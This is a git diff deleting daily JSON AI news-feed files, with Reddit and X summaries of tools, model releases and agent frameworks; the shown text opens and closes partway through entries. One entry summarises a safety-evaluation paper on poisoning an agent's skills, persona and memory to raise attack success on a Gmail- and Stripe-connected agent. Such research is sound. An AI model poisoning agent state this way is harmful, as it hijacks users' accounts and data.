I haven't been doing well health wise and haven't been able to work - I spent $20 of my last $100 buying a Pro sub because my Max sub ended today and I use Claude to assist me with nearly everything at this point.\n\n \nBefore even entering my first prompt, it showed I had already used 11% of ", - "category": "ai_tools" - }, - { - "title": "Second Brain and Haah: human-agent-agent-human network with Claude", - "url": "https://reddit.com/r/ClaudeAI/comments/1setpma/second_brain_and_haah_humanagentagenthuman/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-07T11:50:38.000Z", - "summary": "I built something I genuinely enjoy with Claude. I was working on an app for a year and over last three weeks I completely replaced it with skills for Claude Code. Built frontend, backend, and matching mechanism with Claude. Disrupted myself. Launched six open source skills including Haah: human-agent-agent-human to network for your second brain.\n\nThe idea is to build up a few domains: People, Places, Books, Music, and link them together in a meaningful way. But then would not be cool that if I ", - "category": "ai_tools" - }, - { - "title": "stop buying courses to learn new tools. a $20 claude sub and one prompt is all you need.", - "url": "https://reddit.com/r/ClaudeAI/comments/1setmup/stop_buying_courses_to_learn_new_tools_a_20/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-07T11:46:58.000Z", - "summary": "**tl;dr** — feed a tool's docs into claude's context and use one prompt to turn it into a mentor that teaches by giving you tasks. not by lecturing. i've been doing this since claude launched Projects in mid-2024. 
haven't bought a tech course since.\n\nwhenever i need to pick up a new tool or framework, i skip the 3-hour youtube tutorials. instead, i grab the official docs (markdown from github), dump them into a claude chat, and send this:\n\n`You are my senior mentor. I have provided documentation", - "category": "ai_tools" - }, - { - "title": "[D] Your Agent, Their Asset: Real-world safety evaluation of OpenClaw agents (CIK poisoning raises attack success to ~64–74%)", - "url": "https://reddit.com/r/MachineLearning/comments/1sfbo0n/d_your_agent_their_asset_realworld_safety/", - "source": "Reddit r/MachineLearning", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-07T23:01:39.000Z", - "summary": "Paper: https://arxiv.org/abs/2604.04759\n\nThis paper presents a real-world safety evaluation of OpenClaw, a personal AI agent with access to Gmail, Stripe, and the local filesystem.\n\nThe authors introduce a taxonomy of persistent agent state:\n\n\\- Capability (skills / executable code)\n\n\\- Identity (persona, trust configuration)\n\n\\- Knowledge (memory)\n\nThey evaluate 12 attack scenarios on a live system across multiple models.\n\nKey results:\n\n\\- baseline attack success rate: \\~10–36.7%\n\n\\- after pois", - "category": "ai_research" - }, - { - "title": "Strix Halo + eGPU RTX 5070 Ti via OCuLink in llama.cpp: Benchmarks and Conclusions", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sf9i82/strix_halo_egpu_rtx_5070_ti_via_oculink_in/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-07T21:35:33.000Z", - "summary": "https://preview.redd.it/nqok3dch7utg1.jpg?width=4096&format=pjpg&auto=webp&s=d5c1d3f5e5c1d8c0ba986726d2bda08212175fec\n\nHey everyone. I have a Strix Halo miniPC (Minisforum MS-S1 Max). 
I added an RTX 5070 Ti eGPU to it via OCuLink, ran some tests on how they work together in llama.cpp, and wanted to share some of my findings.\n\n**TL;DR of my findings:**\n\n1. **Vulkan's versatility:** It's a highly efficient API that lets you stably combine chips from different vendors (like an AMD APU +", - "category": "ai_models" - }, - { - "title": "Found this cool new harness, gonna give it a spin with the new GLM 5.1. I’ll report back later.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sf6cds/found_this_cool_new_harness_gonna_give_it_a_spin/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-07T19:37:41.000Z", - "summary": "Found it on a USB drive in the parking lot. Should be interesting.\n\nSeriously tho, props to this guy and his cool Hermes Agent skins library here:\n\nhttps://github.com/joeynyc/hermes-skins", - "category": "ai_models" - }, - { - "title": "Gemma 4 - split mode Graph (Tensor Parallelism) in ik_llama incommming", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sf66a3/gemma_4_split_mode_graph_tensor_parallelism_in_ik/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-07T19:31:37.000Z", - "summary": "[https://github.com/ikawrakow/ik\\_llama.cpp/pull/1596](https://github.com/ikawrakow/ik_llama.cpp/pull/1596)\n\nThis should bring the 31b dense model in a usable speed range for many with dual/multi GPUs.\n\n\n\nAlso today I did quite some PPL Tests today with mainline llama.cpp and ik\\_llama.cpp \nunsloth variants (updated from yesterday) have like INSANE high PPL - without even trying KV Cache quants - on both.\n\nBartowski quants and the ggml-org ones are WAY lower on both, especially lower on ik\\_lla", - "category": "ai_models" - }, - { - "title": "Cloud AI subscriptions are getting desperate with retention. 
honestly makes me want to go more local", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sf305a/cloud_ai_subscriptions_are_getting_desperate_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-07T17:39:09.000Z", - "summary": "Ok so two things happened this week that made me appreciate my local setup way more\n\ntried to cancel cursor ($200/mo ultra plan) and they instantly threw 50% off at me before I could even confirm. no survey, no exit flow, just straight to \"please stay.\" thats not confidence lol\n\nthen claude (im on the $100/mo pro plan) started giving me free API calls. 100 one day, 100 the next day. no email about it, no announcement, just free compute showing up. very \"please dont leave\" energy\n\ntheir core cust", - "category": "ai_models" - }, - { - "title": "[P] A control plane for post-training workflows", - "url": "https://reddit.com/r/MachineLearning/comments/1sf1hdt/p_a_control_plane_for_posttraining_workflows/", - "source": "Reddit r/MachineLearning", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-07T16:47:30.000Z", - "summary": "We have been exploring a project around post-training infrastructure, a minimalist tool that does one thing really well: \nMake post-training a little less painful by equipping Researchers, AI/ML engineers & Tinkerers with a gentle control plane. 
Post-training models tends to introduce a new axis of complexity - the orchestration and compute ressource management - alongside defining your own training loop, your rewards & rubrics, managing the parallel training.\n\nTahuna is CLI-first, it s", - "category": "ai_research" - }, - { - "title": "Auto-creation of agent SKILLs from observing your screen via Gemma 4 for any agent to execute and self-improve", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sey6vv/autocreation_of_agent_skills_from_observing_your/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-07T14:50:28.000Z", - "summary": "AgentHandover is an open-source Mac menu bar app that watches your screen through Gemma 4 (running locally via Ollama) and turns your repeated workflows into structured Skill files that any agent can follow.\n\nI built it because every time I wanted an agent to handle something for me I had to explain the whole process from scratch, even for stuff I do daily. So AgentHandover just watches instead. 
You can either hit record for a specific task (Focus Record) or let it run in the background where it", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-08.json b/data/news-feed-2026-04-08.json deleted file mode 100644 index 752fd9e..0000000 --- a/data/news-feed-2026-04-08.json +++ /dev/null @@ -1,269 +0,0 @@ -{ - "generated": "2026-06-05T00:44:33.098Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-08", - "article_count": 15, - "archived_story_count": 652, - "articles": [ - { - "title": "@Vugola — Vugola Launches API — World's First Agentic Clipping Tool for Creators", - "url": "https://x.com/VadimStrizheus/status/2041498727131517193", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "matching_tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-08T05:24:41.410Z", - "summary": "Vugola has launched an API for the world's first agentic clipping tool. 
Send a YouTube link, your agent asks for ratio and caption styles, and delivers clips via Telegram, Discord, or WhatsApp.", - "category": "ai_tools" - }, - { - "title": "Scoble RT: Zapier Opens SDK to Everyone — 9,000+ App Integrations for AI Agent Builders", - "url": "https://x.com/wadefoster/status/2041721371357851859", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-08T04:15:45.495Z", - "summary": "Robert Scoble retweeted Zapier CEO Wade Foster's announcement that the Zapier SDK is now open to everyone building with AI agents.", - "category": "ai_tools" - }, - { - "title": "How I cut Claude Code usage in half (open source)", - "url": "https://reddit.com/r/ClaudeAI/comments/1sfgnzd/how_i_cut_claude_code_usage_in_half_open_source/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-08T02:41:03.000Z", - "summary": "Every time I start a Claude Code session on a real codebase, it burns through tokens just trying to understand the repo. Read the file tree, open 20 files, trace the imports, figure out how auth connects to the API layer. On a 50k+ LOC project that exploration phase eats your context window before any real work starts.\n\nI built Repowise to fix this. It's a codebase intelligence layer that pre-computes the structural knowledge Claude Code needs and exposes it through MCP tools. Dependency graphs ", - "category": "ai_tools" - }, - { - "title": "I used Claude to build a full networking protocol for AI agents. 
It’s now at 12K+ nodes across 19 countries.", - "url": "https://reddit.com/r/ClaudeAI/comments/1sg6gfe/i_used_claude_to_build_a_full_networking_protocol/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-08T21:40:39.000Z", - "summary": "I’ve been working on a core infrastructure problem for multi-agent systems and wanted to share an update since the last post here got some good discussion.\n\nThe problem: every agent framework assumes agents can already reach each other. MCP gives agents tools, A2A gives agents a way to talk, but both run on HTTP which means someone has to set up public endpoints, open ports, configure DNS, provision certs. The agent can’t do any of that itself. I used Claude Code to build the solution because th", - "category": "ai_tools" - }, - { - "title": "Anthropic launched Claude Managed Agents — cloud-hosted autonomous AI agents", - "url": "https://reddit.com/r/ClaudeAI/comments/1sfzigj/anthropic_launched_claude_managed_agents/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-04-08T17:27:42.000Z", - "summary": "Anthropic released a new API suite for deploying long-running autonomous agents with built-in sandboxing, credential management, and multi-agent coordination. Companies like Notion, Sentry, Asana, and Rakuten are already shipping with it, Sentry's agents are literally writing patches and opening PRs autonomously. 
[https://claude.com/blog/claude-managed-agents](https://claude.com/blog/claude-managed-agents) ", - "category": "ai_tools" - }, - { - "title": "Meta Releases Muse Spark - A Natively Multimodal Reasoning model", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sfyacf/meta_releases_muse_spark_a_natively_multimodal/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-08T16:44:50.000Z", - "summary": "Muse Spark is a natively multimodal reasoning model with support for tool-use, visual chain of thought, and multi-agent orchestration.\n\nBlog: [https://ai.meta.com/blog/introducing-muse-spark-msl/](https://ai.meta.com/blog/introducing-muse-spark-msl/)", - "category": "ai_models" - }, - { - "title": "Liquid AI releases LFM2.5-VL-450M - structured visual understanding at 240ms", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sfxs7f/liquid_ai_releases_lfm25vl450m_structured_visual/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-08T16:27:06.000Z", - "summary": "Today, we release LFM2.5-VL-450M our most capable vision-language model for edge deployment. It processes a 512×512 image in 240ms and it is fast enough to reason about every frame in a 4 FPS video stream. 
It builds on LFM2-VL-450M with three new capabilities:\n\n* bounding box prediction (81.28 on RefCOCO-M)\n* multilingual visual understanding across 9 languages (MMMB: 54.29 → 68.09), and\n* function calling support.\n\nMost production vision systems are still multi-stage: a detector, a classifier, ", - "category": "ai_models" - }, - { - "title": "Used TripoAI's latest open-source model, TripoSG and the image to mesh results are genuinely some of the best I've seen.", - "url": "https://reddit.com/r/StableDiffusion/comments/1sfxbs5/used_tripoais_latest_opensource_model_triposg_and/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-08T16:10:58.000Z", - "summary": "It's pretty neat, used \\~12.5gb out of the box. Output models are pretty high res and its lightning fast and seems like a good starting point compared to the prior TripoSR model.\n\n\n\nAnd, weights are permissively licensed (MIT) which might encourage more people to hack on it.\n\n\n\nAlso worth checking out r/Tripo.ai. They recently dropped the paid model H3.1, the performance is indeed very impressive, with some ongoing discount offers. That said, I'm curious: if a company releases newer models, is i", - "category": "creative_tools" - }, - { - "title": "M5 Max 128GB, 17 models, 23 prompts: Qwen 3.5 122B is still a local king", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sfr6u4/m5_max_128gb_17_models_23_prompts_qwen_35_122b_is/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-08T12:18:39.000Z", - "summary": "The last Llama (Scout/Maverick) was released a year ago. Since then US based releases have been super rare: Granite 3.3, GPT-OSS 20B & 120B, Nemotron 3 Nano / Super and now Gemma 4. 
Can't even compare to the solid Chinese open model output or Qwens, DeepSeeks, Kimis, MiniMaxes, GLMs, MiMos, Seeds, etc..\n\nGemma 4 is like a breath of fresh air. Not just the model itself, but the rollout, [the beauty](https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-gemma-4), the innovation: K=V i", - "category": "ai_models" - }, - { - "title": "Last Week in Multimodal AI - Local Edition", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sfk3ml/last_week_in_multimodal_ai_local_edition/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-08T05:36:35.000Z", - "summary": "I curate a weekly multimodal AI roundup, here are the local/open-source highlights from the last week:\n\n* **Google Gemma 4** \\- Open model family for coding and logical reasoning with a massive context window. Runs on a single machine.  [Post](https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/) | [Models](https://huggingface.co/blog/gemma4)\n* **TII Falcon Perception** \\- 0.6B early-fusion VLM with open-vocabulary grounding, segmentation, and OCR. Punches way above its wei", - "category": "ai_models" - }, - { - "title": "@omma_ai — Omma Launches Audio Generation — Music, Sound Effects, and Text to Speech", - "url": "https://x.com/omma_ai/status/2041622310503997632", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-08T05:24:41.410Z", - "summary": "Omma has launched audio generation including music and songs, sound effects, and text to speech. 
Users can generate audio and ask Omma to use it on websites, apps, and visualizations — usually in seconds.", - "category": "ai_tools" - }, - { - "title": "Review This Prompt And Feedback it.", - "url": "https://reddit.com/r/ChatGPT/comments/1sfo5qw/review_this_prompt_and_feedback_it/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.86, - "date": "2026-04-08T09:41:43.000Z", - "summary": " ROLE\n\nYou are an expert \\[e.g. full-stack developer / product designer / ML engineer\\] with deep experience in \\[tech stack / domain\\].\n\nYour job is to build this project end-to-end — from architecture to final output — with zero hand-holding needed.\n\n PROJECT\n\nName: \\[Project name\\]\n\nType: \\[Web app / CLI tool / API / Dashboard / Bot / etc.\\]\n\nOne-liner: \\[What it does in one sentence\\]\n\nTarget user: \\[Who will use this\\]\n\nGOAL\n\nBuild a complete, working, production-ready \\[project type\\] that", - "category": "ai_tools" - }, - { - "title": "Reddit is broken! I proved it with Claude", - "url": "https://reddit.com/r/ClaudeAI/comments/1sfk205/reddit_is_broken_i_proved_it_with_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.78, - "date": "2026-04-08T05:34:03.000Z", - "summary": "Built this for a hackathon. It's a Chrome extension that rescores every comment in a Reddit or HN thread using actual relevance instead of karma.\n\n**How I built it with Claude:**\n\nI used Claude (Sonnet via API) for pretty much the entire thing, generating the Chrome extension scaffold, writing the content extraction logic that pulls comments from Reddit's DOM, and building the ranking pipeline that sends comments to ZeroEntropy's zerank-2 model for instruction-reranking. 
Claude also helped me wr", - "category": "ai_tools" - }, - { - "title": "I built an MCP that gives Claude Code its own servers to fix bugs in parallel", - "url": "https://reddit.com/r/ClaudeAI/comments/1sg5j6w/i_built_an_mcp_that_gives_claude_code_its_own/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.7, - "date": "2026-04-08T21:05:27.000Z", - "summary": "I am increasingly using Claude Code, as much as and my laptop couldn't keep up. That macOS \"force quit\" window popped up so much I kept that window permanently open to resume activities... I had multiple projects and wanted to fix a dozen of bugs at the same time, generate other long features. Many agents on one machine doesn't work well, they eat resources and trip over each other.\n\nSo I built Gibil, a CLI that gives each task its own throwaway Linux. Real VM on Hetzner, about a minute, \\~$0.03", - "category": "ai_tools" - }, - { - "title": "Turbo-OCR for high-volume image and PDF processing", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sg8lfr/turboocr_for_highvolume_image_and_pdf_processing/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-08T23:08:06.000Z", - "summary": "I recently had to process \\~940,000 PDFs. I started with the standard OCR tools, but the bottlenecking was frustrating. Even on an RTX 5090, I was seeing low speed.\n\nThe Problem:\n\n* PaddleOCR (the most popular open source OCR): Maxed out at \\~15 img/s. GPU utilization hovered around 15%. 
Their high performance inference mode doesn't support Blackwell GPUs yet (needs CUDA < 12.8) and doesn't work with the latin recognition model either.\n* VLM OCR (via vLLM): Great accuracy, but crawled at 2 im", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-09.json b/data/news-feed-2026-04-09.json deleted file mode 100644 index 9edbb2b..0000000 --- a/data/news-feed-2026-04-09.json +++ /dev/null @@ -1,253 +0,0 @@ -{ - "generated": "2026-06-05T00:44:33.363Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-09", - "article_count": 15, - "archived_story_count": 616, - "articles": [ - { - "title": "Hermes Agent Is Displacing OpenClaw — And Nobody Is Talking About It", - "url": "https://x.com/ghumare64/status/2042234817358462986", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-09T14:33:10.226Z", - "summary": "Hermes Agent is quietly displacing OpenClaw as the dominant open-source AI agent framework, with a new memory plugin and viral tutorials driving adoption. 
The architectural difference is fundamental.", - "category": "ai_tools" - }, - { - "title": "OpenWork, an opensource Claude Cowork alternative, is silently relicensing under a commercial license", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sgnppg/openwork_an_opensource_claude_cowork_alternative/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-09T12:05:50.000Z", - "summary": "OpenWork is a locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode.\n\nJust a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore).\n\nMore details here: https://github.com/different-ai/openwork/issues/1412\n\nNote that as a fellow opensource developer mys", - "category": "ai_models" - }, - { - "title": "OpenWork, an opensource Claude Code alternative, is silently relicensing under a commercial license", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sgm9d1/openwork_an_opensource_claude_code_alternative_is/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-09T10:54:02.000Z", - "summary": "OpenWork is locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode.\n\nJust a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore).\n\nMore details here: https://github.com/different-ai/openwork/issues/1412\n\nNote that as a fellow opensource 
developer mysel", - "category": "ai_models" - }, - { - "title": "I built a multi-agent coordination plugin for Claude Code using Royal Navy procedures. 237 stars later I'm still not sure if the metaphor is genius or unhinged.", - "url": "https://reddit.com/r/ClaudeAI/comments/1sgx5i0/i_built_a_multiagent_coordination_plugin_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-04-09T17:59:55.000Z", - "summary": "So earlier this year Anthropic shipped the experimental Agent Teams feature. I'd spent the Christmas break reading about the Gas Town vision and was properly excited to try it. Agent Teams felt like Claude Code's version of a mini Gas Town.\n\nThen I actually used it. Agent one rewrote a module. Agent two rewrote that module's tests. Agent three updated the integration layer that depended on both. Nobody told agent three about the interface changes from agents one and two.\n\nThree pieces of perfect", - "category": "ai_tools" - }, - { - "title": "Managed Agents launched today. I built a Slack relay, tested it end-to-end. Here's what I found.", - "url": "https://reddit.com/r/ClaudeAI/comments/1sgejap/managed_agents_launched_today_i_built_a_slack/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-09T03:36:27.000Z", - "summary": "Managed Agents dropped a few hours ago. I had been reading the docs ahead of time, so I built a full Slack relay right away - Socket Mode listener, session-per-channel management, SSE streaming, cost tracking via span events. Tested multi-turn conversations, tool usage, session persistence. Wanted to share what I found. \n\nThe prompt caching is genuinely impressive. 
My second session cost $0.006 because the system prompt and tool definitions were served from cache automatically. API design is cle", - "category": "ai_tools" - }, - { - "title": "I built a security scanner for Claude Code (and vibe coding in general) — here's what it found in my own projects", - "url": "https://reddit.com/r/ClaudeAI/comments/1sgboiu/i_built_a_security_scanner_for_claude_code_and/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.78, - "date": "2026-04-09T01:24:01.000Z", - "summary": "I built VibeLint using Claude Code. It runs as an MCP server inside your IDE and scans AI-generated code for security issues before it gets written to your files.\n\nWhile building it, I started scanning my own projects with it. What I found was uncomfortable.\n\nIn one file, it caught my OpenAI API key and my Supabase service role key — both hardcoded by the AI. The service role key bypasses RLS entirely, meaning anyone with it has unrestricted access to the database.\n\nAcross my last 5 projects, th", - "category": "ai_tools" - }, - { - "title": "your claude doesn't need a better memory, it needs a self-evolving knowledge base", - "url": "https://reddit.com/r/ClaudeAI/comments/1sgr5zz/your_claude_doesnt_need_a_better_memory_it_needs/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-04-09T14:27:00.000Z", - "summary": "https://i.redd.it/57wdspbqc6ug1.gif\n\nAndrej Karpathy recently shared his setup for building a personal LLM knowledge base - raw docs, LLM compiles them into a structured wiki, then queries the wiki for answers.\n\nI've been building something similar for the past year, except it's not a set of scripts - it's a plugin you can install in 2 minutes.\n\nThe idea: every conversation you have in claude (Desktop, claude code or any 
MCP-compatible tool like codex, cursor) gets compacted into a memory episod", - "category": "ai_tools" - }, - { - "title": "Chinese AI models (Qwen, Kimi, MiniMax) are going closed-source. Does that kill their appeal for you?", - "url": "https://reddit.com/r/ChatGPT/comments/1sgfp00/chinese_ai_models_qwen_kimi_minimax_are_going/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 0.62, - "date": "2026-04-09T04:34:27.000Z", - "summary": "Honest question for people who actually use these models:\n\nThe main reason I and many others trusted Chinese AI models was open source — you could run them locally, inspect the weights, avoid sending data to Chinese servers. That felt like a reasonable workaround for anyone with privacy or geopolitical concerns.\n\nNow that they're closing up, the calculus changes:\n\n\\- No local deployment\n\n\\- API calls go to servers in China\n\n\\- No way to verify what the model is actually doing\n\nIs this a dealbrea", - "category": "ai_tools" - }, - { - "title": "Dynamic few-shot retrieval on Apple's on-device 3B LLM: 40% → 70%+ on shell commands", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sgxo6d/dynamic_fewshot_retrieval_on_apples_ondevice_3b/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-09T18:17:58.000Z", - "summary": "I've been poking at Apple's on-device 3B model (via FoundationModels on Tahoe) to see where its ceiling sits on code-adjacent tasks. Tested shell command generation as a concrete benchmark (100 prompts, \\~10 approaches)\n\nhttps://i.redd.it/ferxmyorh7ug1.gif\n\nBare model: \\~40% correct. Mostly flags and some command hallucinations. Feeding documentation as context didn't help. Not man pages, not tldr as docs, not self-critique loops. 
All within noise of baseline, and self-critique was actively wors", - "category": "ai_models" - }, - { - "title": "OpenAI pauses UK data centre deal over energy costs and regulationThe project was part of a package of tech investment promising the UK could become an AI superpower.See more", - "url": "https://www.bbc.com/news/articles/clyd032ej70o", - "source": "BBC AI", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-09T18:00:10.184Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "I benchmarked 42 STT models on medical audio with a new Medical WER metric — the leaderboard completely reshuffled", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sgtrgc/i_benchmarked_42_stt_models_on_medical_audio_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-09T16:00:16.000Z", - "summary": "**TL;DR:** I updated my medical speech-to-text benchmark to **42 models** (up from 31 in v3) and added a new metric: **Medical WER (M-WER)**.\n\nStandard WER treats every word equally. In medical audio, that makes little sense — **“yeah” and “amoxicillin” do not carry the same importance**.\n\nSo for v4 I re-scored the benchmark using only **clinically relevant words**: drugs, conditions, symptoms, anatomy, and clinical procedures. I also broke out **Drug M-WER** separately, since medication names a", - "category": "ai_models" - }, - { - "title": "LG Just Released the First Open-Weight Vision Language Model for Physical Intelligence", - "url": "https://x.com/LG_AI_Research", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-09T14:33:10.226Z", - "summary": "LG AI Research launched EXAONE 4.5, their first open-weight Vision Language Model targeting physical intelligence and robotics. 
LG's hardware and manufacturing expertise gives them unique insight into what robots need.", - "category": "ai_tools" - }, - { - "title": "Open-Source Models Can Do Everything Claude Mythos Can Do", - "url": "https://x.com/stanislavfort", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-09T14:33:10.226Z", - "summary": "Researchers replicated all 8 Mythos security vulnerabilities using open-source models, proving dangerous AI capabilities cannot be contained by restricting frontier model access. The finding has major implications for AI safety policy.", - "category": "ai_tools" - }, - { - "title": "NanoBanana Powers WorldAgents — AI Image Generator Used for 3D World Creation", - "url": "https://x.com/MattNiessner/status/2036019740930408905", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-09T14:29:35.589Z", - "summary": "NanoBanana is being used as the Generator in WorldAgents for 3D world creation, demonstrating how AI image models are being integrated into complex multi-agent creative systems. 
The integration highlights NanoBanana's versatility.", - "category": "ai_tools" - }, - { - "title": "Unused phone as AI server", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sgqlfn/unused_phone_as_ai_server/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-09T14:05:51.000Z", - "summary": "If you have an unused phone lying around, you might be sitting on a tiny AI server\n\nI’ve been working on a project where I modified Google AI Edge Gallery and turned it into an OpenAI-compatible API server: \\[Gallery as Server\\](https://github.com/xiaoyao9184/gallery)\n\nYour phone can run local AI inference\n\nYou can call it just like an OpenAI API (chat/completions, etc.)\n\nInstead of letting that hardware collect dust, you can turn it into a lightweight inference node.\n\nSo yeah—if you have more t", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-10.json b/data/news-feed-2026-04-10.json deleted file mode 100644 index 391cf9f..0000000 --- a/data/news-feed-2026-04-10.json +++ /dev/null @@ -1,245 +0,0 @@ -{ - "generated": "2026-06-05T00:44:33.549Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-10", - "article_count": 15, - "archived_story_count": 178, - "articles": [ - { - "title": "Anthropic just shipped 74 product releases in 52 days and silently turned Claude into something that isn't 